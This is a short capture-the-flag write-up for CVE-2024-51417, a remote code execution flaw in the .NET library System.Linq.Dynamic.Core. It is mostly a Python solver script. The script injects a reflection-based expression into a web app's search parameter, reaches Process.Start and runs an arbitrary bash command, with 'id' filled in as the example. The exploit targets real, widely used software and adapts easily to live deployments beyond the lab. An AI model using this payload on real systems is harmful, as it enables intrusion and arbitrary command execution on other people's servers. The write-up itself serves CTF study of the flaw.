CVE-2024-51417: System.Linq.Dynamic.Core RCE (Reflective)

Attachments

References

https://github.com/Kamal-Hegazi/CTF-Writeups/tree/main/crewCTF_2025/Web/Reflective

CVE-2024-51417: System.Linq.Dynamic.Core allows remote access to properties on reflection types and static properties/fields · Issue #867

---

CVE-2024-51417 is a vulnerability in System.Linq.Dynamic.Core that allows remote access to properties on reflection types and static properties/fields, leading to RCE.

Solver

import httpx

url = "http://localhost:8080"

payload = r'") && "".GetType().Assembly.DefinedTypes.Where(it.Name == "AppDomain").First().DeclaredMethods.Where(it.Name == "CreateInstanceAndUnwrap").First().Invoke("".GetType().Assembly.DefinedTypes.Where(it.Name == "AppDomain").First().DeclaredProperties.Where(it.name == "CurrentDomain").First().GetValue(null), "System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089; System.Diagnostics.Process".Split(";".ToCharArray())).GetType().Assembly.DefinedTypes.Where(it.Name == "Process").First().DeclaredMethods.Where(it.name == "Start").Take(3).Last().Invoke(null, "/bin/bash;-c \"COMMAND\"".Split(";".ToCharArray())).GetType().ToString() == ("'

command = "id"
payload = payload.replace("COMMAND", command)

r = httpx.get(f"{url}/Notes", params=dict(search=payload))
print(r.text)